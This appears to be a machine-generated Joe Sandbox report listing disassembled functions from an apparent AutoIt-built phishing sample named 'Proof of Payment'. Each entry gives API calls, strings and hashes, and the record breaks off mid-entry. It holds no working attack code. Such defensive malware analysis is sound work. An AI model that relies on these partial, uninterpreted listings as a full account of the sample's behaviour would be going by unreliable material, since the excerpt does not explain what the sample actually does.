Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 04983cbeaf4cc896935511dfa8927c96fb63bfef03640a7328c05e1d1e1dc44b
Instruction ID: c6be1732efe1687b8e43abf02226d6ad45e4206e6eade1e5381bbabbb15a03c6
Opcode Fuzzy Hash: 04983cbeaf4cc896935511dfa8927c96fb63bfef03640a7328c05e1d1e1dc44b
Instruction Fuzzy Hash: DA41E672A0421EBADF20DAA4DC41FEF77B9AF49714F000069FA05EB191D775AA04DB91

Function 0101A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0101A85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0101A86F

Strings

', xrefs: 0101A7C3

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: b83bdb66067d264d58d86e5ab2b8dad8b5675a01ed298aa15c55e0ce9f3bbc96
Instruction ID: 988b0b335a78555d7319595186a44c39b41417a0c24477835837dbb8dfb75d87
Opcode Fuzzy Hash: b83bdb66067d264d58d86e5ab2b8dad8b5675a01ed298aa15c55e0ce9f3bbc96
Instruction Fuzzy Hash: AD41E774E01249DFDB54CFA8C881BDA7BB9FF08704F14006AEA45AB385D775A941CFA0

Function 01005180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01005190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 010051C6

Strings

|, xrefs: 010051B5

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 144006756daff54869cdc2e59c5007daa31b66ae02d72e809ab7b414fd0fc419
Instruction ID: f60677df67518f7ed7043115ce4c97c54ee0f224573580043e5c53d92f60ef03
Opcode Fuzzy Hash: 144006756daff54869cdc2e59c5007daa31b66ae02d72e809ab7b414fd0fc419
Instruction Fuzzy Hash: C6312871C01119ABDF01EFA5CC85AEEBFB9FF19710F000059F915A6166EB35AA06DFA0

Function 0101975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0101980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0101984A

Strings

static, xrefs: 010197AA

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: f04714b09d701ce59c98b2ebfb4dc12d7f039f8e943b7a45f19fb03077d2b8d8
Instruction ID: d5f4ffde66f96d842c1f35d5b67c227ce7c0ba23219c155e058c3bbc9e695bdb
Opcode Fuzzy Hash: f04714b09d701ce59c98b2ebfb4dc12d7f039f8e943b7a45f19fb03077d2b8d8
Instruction Fuzzy Hash: FC317E71100604AEEB119F78CC91BFB77A9FF58764F008619F9E9C7195CB39A881D760

Function 00FF5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF51C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00FF5201

Strings

0, xrefs: 00FF51BF

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: e2ad004e5cf08c6e6013a295efe27314619793c03149cd3edccfad9724875abd
Instruction ID: c2ec987e29a060487ca2166da96b098802535a6acc49aae4a2c974e93bf52265
Opcode Fuzzy Hash: e2ad004e5cf08c6e6013a295efe27314619793c03149cd3edccfad9724875abd
Instruction Fuzzy Hash: F431C331E006099BEB24CF99D885BBEBBB5BF45B60F140119EB85A61B0D7749A44EB10

Function 0100658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 01006608

Strings

, $, xrefs: 01006648
AUTOITCALLVARIABLE%d, xrefs: 010065FA

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 3a506b503730c8d46a0beec02b4187957e4653a2239180d5f85309c990b0c3c6
Instruction ID: 7877ee1dc8fe9169c7ef17e38b1abd15b4a61bdc964c56075051f345d29dfd2d
Opcode Fuzzy Hash: 3a506b503730c8d46a0beec02b4187957e4653a2239180d5f85309c990b0c3c6
Instruction Fuzzy Hash: E821BD71600219AFCF11EFA9CC82EEE77B5BF49700F000069F145AF181DA39E915DBA1

Function 010193CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0101945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01019467

Strings

Combobox, xrefs: 01019429

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 1e1961fe35e50072f231ea964fcd57bb068c61c4f8592f6a84a660c0d060bf20
Instruction ID: 3d076a9719e5fa859e9589536170f392d72e590e7df02d519cb06e9254782aaa
Opcode Fuzzy Hash: 1e1961fe35e50072f231ea964fcd57bb068c61c4f8592f6a84a660c0d060bf20
Instruction Fuzzy Hash: 7411E6713401086FEF22DE58CC90EFB37AEEB483A8F104125F99497295D6399C518760

Function 010198FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00FCD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FCD1BA
Part of subcall function 00FCD17C: GetStockObject.GDI32(00000011), ref: 00FCD1CE
Part of subcall function 00FCD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FCD1D8

GetWindowRect.USER32(00000000,?), ref: 01019968
GetSysColor.USER32(00000012), ref: 01019982

Strings

static, xrefs: 01019945

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: a9d37745f4c51fcbeef97bb1ac87f4d681858f419f03329e30ecfea8f031cffd
Instruction ID: a3091312a351aa7412c93a28aa1c94320ce0d86cc713b1d7fd2342a65fce28d6
Opcode Fuzzy Hash: a9d37745f4c51fcbeef97bb1ac87f4d681858f419f03329e30ecfea8f031cffd
Instruction Fuzzy Hash: 11113A7251020AAFDB15DFB8C845EEE7BA9FB08348F054629F995E3140D739E850DB60

Function 01019617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 01019699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010196A8

Strings

edit, xrefs: 0101967D

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: b948d9f954f4890cdac511e0095992c663d45b1c2b8b6767334b15fdb078603a
Instruction ID: 67f8224079b6f2d471cd5947df4b85459cca3b56b2c2cca238986f89a025dae5
Opcode Fuzzy Hash: b948d9f954f4890cdac511e0095992c663d45b1c2b8b6767334b15fdb078603a
Instruction Fuzzy Hash: 5611BF71500108AFEB215EA8DC50EEB3BAAEB0937CF500B14F9A5931D8C739DC50D760

Function 00FF5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF52D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00FF52F4

Strings

0, xrefs: 00FF52CE

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: f1fb56ea2b0b70c48fa1061a1a802a1b97f475e6952cb1f13380d68633eb4ae6
Instruction ID: abfeb3df137ff136a2aa30f7e8178303362dc3421515ffacf742b66b947e0982
Opcode Fuzzy Hash: f1fb56ea2b0b70c48fa1061a1a802a1b97f475e6952cb1f13380d68633eb4ae6
Instruction Fuzzy Hash: 9B11E272D01628ABDB20DA9CD944BBD77BAAF05B64F040115EB41E72B4D3B0ED08E790

Function 01004D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 01004DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01004E1E

Strings

<local>, xrefs: 01004DE6

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: faa02c63e500055cf193e15f90fc3b58cae83d0c95999fc082b071e480d561da
Instruction ID: 02313b6cb93087a907496dbb54dd9f03c20076b89c097656834dbd838c1c1586
Opcode Fuzzy Hash: faa02c63e500055cf193e15f90fc3b58cae83d0c95999fc082b071e480d561da
Instruction Fuzzy Hash: 3811A070501261FBEB279F55C888EFBFBACFF06654F00822BF68596180E3B09954C6E4

Function 0100A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000), ref: 0100A84E
htons.WSOCK32(00000000), ref: 0100A88B

Strings

255.255.255.255, xrefs: 0100A866

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 4b65378caf457d5fc5cfd7f72dd50a6cd6efa4b2e3a2046b66993fe4a3df8ff1
Instruction ID: b4f5d25ad2299fca967d4972155974887865b32c0d5b94b33e93aacea02cbb99
Opcode Fuzzy Hash: 4b65378caf457d5fc5cfd7f72dd50a6cd6efa4b2e3a2046b66993fe4a3df8ff1
Instruction Fuzzy Hash: EF01F575300305EBEB229FA8C886FAEB3A8FF44710F10856AF5569B2D1D775E902C791

Function 00FEB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FEB7EF

Strings

ComboBox, xrefs: 00FEB78B
ListBox, xrefs: 00FEB7B9

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 60ea57cf5427ea48cc7fcebba3bf28b2d7b186e03a7396696f82a676408d8a62
Instruction ID: 68ede78afba4439e7be0af4248d0322633a269a3589331ad445fa2ef0d93e535
Opcode Fuzzy Hash: 60ea57cf5427ea48cc7fcebba3bf28b2d7b186e03a7396696f82a676408d8a62
Instruction Fuzzy Hash: 4601B171641154ABCB04EBA5CC52AFF336DAF46350B04061DF472672D2EB795918AB90

Function 00FEB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 00FEB6EB

Strings

ComboBox, xrefs: 00FEB687
ListBox, xrefs: 00FEB6B5

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: de2dca6af3973adce6dacf0692d9f67e8bc31762c4f5a2c81d903f6a3064361c
Instruction ID: 8fbe7bfdc56aa9444e58919a384337f729c4c7b616da66de7b3abc2fb44d5f14
Opcode Fuzzy Hash: de2dca6af3973adce6dacf0692d9f67e8bc31762c4f5a2c81d903f6a3064361c
Instruction Fuzzy Hash: E501A271A41148ABCB04EBA6CD52BFF73BC9F45344F14002DB442B7181DB989E18ABF5

Function 00FEB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 00FEB76C

Strings

ComboBox, xrefs: 00FEB70A
ListBox, xrefs: 00FEB738

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 4880337869c5797bfa89fc6ebc6daf63d03798273155ec1b9ee08818a7bc5389
Instruction ID: a07c0502621f69ade88b8aa6369dec3ce23993e2c1b03b191ac0bf5d511c869b
Opcode Fuzzy Hash: 4880337869c5797bfa89fc6ebc6daf63d03798273155ec1b9ee08818a7bc5389
Instruction Fuzzy Hash: 4901D176A41144ABCB00EBA6CD02FFF73AC9B45344F540019B842B3192DB699E19ABB5

Function 00FF7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00FF7762
_wcscmp.LIBCMT ref: 00FF7774

Strings

#32770, xrefs: 00FF776E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 30f8247e6a787bfbbb5f336aba3b8e77d1874908b11301410921848dd921f083
Instruction ID: e3863d74a695c1310bf66ee2eb69745636669c1ad72f770882511e17a21bd7b3
Opcode Fuzzy Hash: 30f8247e6a787bfbbb5f336aba3b8e77d1874908b11301410921848dd921f083
Instruction Fuzzy Hash: 5DE09277A0432827D720AAA5AC09E97FBACBB55760F00411AB955E7141D674EA0187E4

Function 00FEA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00FEA63F

Part of subcall function 00FD13F1: _doexit.LIBCMT ref: 00FD13FB

Strings

AutoIt, xrefs: 00FEA633
Error allocating memory., xrefs: 00FEA638

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: f8beaac22b8d9c576a4462dc30584e38695bbf1b1d77713195df7cf94d2c25dd
Instruction ID: 60ed5549323c7fba5cdb845fbbe6796163e0d9027366cde359f928cdf48e0675
Opcode Fuzzy Hash: f8beaac22b8d9c576a4462dc30584e38695bbf1b1d77713195df7cf94d2c25dd
Instruction Fuzzy Hash: 2AD02B313C471833C21437DA2C07FC4764C8B15BA1F08002ABB48D91C249EAD54063E9

Function 0102AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 0102ACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0102AEBD

Strings

WIN_XPe, xrefs: 0102ACD3

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: b3355fc84e572d28703921fabe96f2df590774a2f192bbf9e1a35c1cc6b15976
Instruction ID: 8d84790df2831aa81e3db0af2ef07e43f5511df013dbf0ca74e7d4eafe36fb5f
Opcode Fuzzy Hash: b3355fc84e572d28703921fabe96f2df590774a2f192bbf9e1a35c1cc6b15976
Instruction Fuzzy Hash: 77E06D70D0061DEFDB21DBA8D944AECBBBCAB58310F108096E186B3950CB714A84DF20

Function 01018698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010186A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 010186B5

Part of subcall function 00FF7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FF7AD0

Strings

Shell_TrayWnd, xrefs: 0101869B

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 610fbe18f2428b610f111f71b121edcdf80838ffd3e16aca8e9249c9df78519b
Instruction ID: 7e5e4a806bea88769c9084e41042bcdd1caffec801019d7db75523a93a2497be
Opcode Fuzzy Hash: 610fbe18f2428b610f111f71b121edcdf80838ffd3e16aca8e9249c9df78519b
Instruction Fuzzy Hash: ABD01231794318B7E27476B09C0BFD67E1CAF04B11F510819B789AF1D4C9E9E950C754

Function 010186CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010186E2
PostMessageW.USER32(00000000), ref: 010186E9

